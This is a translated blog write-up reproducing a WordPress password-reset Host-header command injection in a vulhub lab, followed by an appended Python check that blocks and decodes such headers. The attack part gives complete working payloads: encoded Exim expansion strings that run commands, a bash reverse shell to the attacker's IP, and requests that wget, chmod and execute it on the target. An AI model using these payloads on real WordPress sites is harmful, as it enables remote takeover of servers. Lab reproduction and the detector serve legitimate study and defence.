Introduction
WordPress is a blogging platform written in PHP; users can set up their own website on any server that supports PHP and a MySQL database. It is also regarded as a content management system (CMS).
Environment setup
Docker environment (for the setup, see: https://www.cnblogs.com/BlogVice-2203/p/16977227.html). The target environment can be downloaded from vulhub.
Target machine (CentOS 7): 192.168.31.230
Attacker machine (Kali): 192.168.31.153
After importing it, start the target environment:
docker-compose build
docker-compose up -d
Visit http://your-ip:8080/ and install the CMS.
Vulnerability reproduction
The vulnerable point is the forgot-password (password reset) function; an existing username is needed in order to send the request.
Change the value of the Host field in the request to the value below and send the request; this creates a file named success under /tmp:
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Next, create a file 1.txt under /var/www/html on Kali with the following content, then start Apache:
bash -i >& /dev/tcp/192.168.31.153/5566 0>&1
service apache2 start
Send the shell request, which fetches the content of 1.txt onto the target and stores it in a new file named shell (equivalent to /usr/bin/wget --output-document /tmp/shell 192.168.31.153/1.txt):
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.31.153${substr{0}{1}{$spool_directory}}1.txt
Send a request that changes the permissions of the shell file to 777 (executable by anyone):
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}chmod${substr{10}{1}{$tod_log}}777${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
Send a request that executes the shell file, while Kali listens on port 5566:
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
Reproduction summary
1. The vulnerability lies in the Host field of the request; the executed command must not contain the characters : or '
2. Commands must be given with absolute paths
3. A space is replaced by ${substr{10}{1}{$tod_log}} and / is replaced by ${substr{0}{1}{$spool_directory}}
4. The field value must be entirely lowercase, and an existing username is required
Using this vulnerability, a file containing a reverse shell is delivered, its permissions are changed to 777, and a listener on Kali then receives the shell.
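As an added defensive example (not part of the original post), the following Python check is one a reverse proxy or log pipeline could apply to the Host header: it accepts only syntactically valid host names, blocks values carrying Exim string-expansion syntax (the ${run{...}} and ${substr{...}} items seen above), and decodes the two placeholders listed in the summary so an analyst can read the embedded command. The sample Host values are constructed, except the third, which is the proof-of-concept value from this post.

```python
import re

# RFC 1123 host name, optionally followed by ":port" (labels: alnum and "-", 1-63 chars)
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{LABEL}(?:\.{LABEL})*(?::\d{{1,5}})?$", re.I)

# Exim string-expansion items; none of them belongs in a Host header
EXPANSION_RE = re.compile(r"\$\{\s*(run|substr|extract|lookup|readfile|readsocket)\b", re.I)

# Substitutions the post documents: the first character of $spool_directory is "/",
# and character 10 of $tod_log is a space
PLACEHOLDERS = {
    "${substr{0}{1}{$spool_directory}}": "/",
    "${substr{10}{1}{$tod_log}}": " ",
}

def normalize(host: str) -> str:
    """Replace the documented placeholders so an analyst can read the embedded command."""
    for item, char in PLACEHOLDERS.items():
        host = host.replace(item, char)
    return host

def classify(host: str) -> dict:
    """Verdict for one Host header value: 'ok' (syntactically a host name, optionally
    host:port), 'block' (expansion syntax present: reject and alert, with a decoded
    copy for triage), or 'review' (malformed but no expansion syntax: log it)."""
    value = host.strip()
    if HOSTNAME_RE.match(value):
        return {"verdict": "ok", "host": value}
    if EXPANSION_RE.search(value):
        return {"verdict": "block", "host": value, "decoded": normalize(value)}
    return {"verdict": "review", "host": value}

# Constructed sample of Host values as a reverse proxy or log parser would see them;
# the third entry is the proof-of-concept value shown in the post above
SAMPLE_HOSTS = [
    "blog.example.com",
    "blog.example.com:8080",
    "target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin"
    "${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}"
    "${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)",
    "blog.example.com/..",
]

if __name__ == "__main__":
    for sample in SAMPLE_HOSTS:
        print(classify(sample))
```

The blocked verdict is the one to alert on; a stricter deployment would also compare accepted values against an allowlist of the site's own host names.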
This article is from cnblogs (博客園), author: Vice_2203. When reposting, please cite the original link: https://www.cnblogs.com/BlogVice-2203/p/17083257.html